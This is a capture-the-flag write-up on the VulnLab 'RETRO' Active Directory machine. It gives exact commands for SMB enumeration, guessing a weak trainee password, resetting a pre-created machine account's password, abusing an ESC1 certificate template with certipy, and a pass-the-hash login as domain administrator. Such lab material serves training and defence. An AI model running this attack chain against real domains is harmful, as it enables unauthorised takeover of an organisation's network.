Where Notes Work
RETRO – VULNLAB
This is the Write-up/Walkthrough of the RETRO Active Directory Machine from VULNLAB.
Note: IP is changed in some commands because stopping and starting the machine again gives new IP every time.
NMAP SCAN:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-14 18:32:06Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
SNIP
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.re
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-14T18:32:48+00:00
|_ssl-date: 2023-08-14T18:33:28+00:00; +2s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 12722/tcp): CLEAN (Timeout)
| Check 2 (port 26063/tcp): CLEAN (Timeout)
| Check 3 (port 31296/udp): CLEAN (Timeout)
| Check 4 (port 53820/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2023-08-14T18:32:49
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Domain: retro.vl, BIOS Name: DC
Looking for smb share found, there is trainees share only allowed to read without credentials.
found Important.txt file on Trainees share, saying.
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
Message saying that everyone is struggling with strong and unique passwords. so, Admins assign everyone to one account and maybe gave an easy password?
Enumerating users using impacket-lookupsid or lookupsid.py as anonymous user and blank password.
impacket-lookupsid [email protected]
Users found:
trainee
BANKING$
jburley
HelpDesk
tblack
krbtgt
As said in the Important.txt, tried to authenticate to smb with “trainee” username and password “trainee”, now i can read Notes Share.
Logged in using smbclient and downloaded ToDo.txt file
smbclient //10.10.115.87/Notes -U trainee%trainee
Notes saying:
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
Looking at the message found that, they talking about pre-created computer account, looking up on google about “pre created computer account” found this blog, which explains and shows how to abuse pre-created computer accounts.
I already found BANKING$ machine account, I tried changing the password of the machine account.
Using changepasswd.py to change the password of BANKING$ machine account with an alternative username and password, and setting the new password for BANKING$ machine account.
python3 changepasswd.py retro.vl/banking$:[email protected] -altuser trainee -altpass trainee -newpass hacker@123
It works, and the password got changed for BANKING$ machine account.
after that, I tried using bloodhound-python using trainee and machine account user, but it was showing a DNS error, looking forward, enumerating for certificates using certipy.
certipy find -u 'banking$'@retro.vl -p hacker@123 -dc-ip 10.10.115.87
cat 20230815033909_Certipy.txt
I found that “RetroClients” certificate is vulnerable for ESC1, as I am authenticating it as a Computer account, and I have Enrollment Rights.
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
Requesting certificate for Template “RetroClients”, for Administrator UPN(User Principal Name) and setting key-size to 4096, as mentioned “Minimum RSA Key Length”.
Note: Make sure you added dc.retro.vl and retro.vl to /etc/hosts file.
certipy req -u 'banking$'@retro.vl -p 'hacker@123' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn '[email protected]' -dns 'dc.retro.vl' -key-size 4096 -debug
After getting the pfx file (private key), used certipy to authenticate to DC using the private key.
certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.104.45
After Entering command, It asked to Select “UPN” or “DNS Host Name”, selected UPN by entering 0, and got the hash of the administrator account, after that, I tried logging in to RDP using PTH method, but blank password login was not allowed after that tried also evil-winrm, it was also not responding, but still I have many other options to login to administrator account using the hash.
Used impacket-wmiexec to log in as administrator using the PTH(PASS THE HASH) method, and got shell as administrator.
impacket-wmiexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
If you face any problems, let me know in the comment.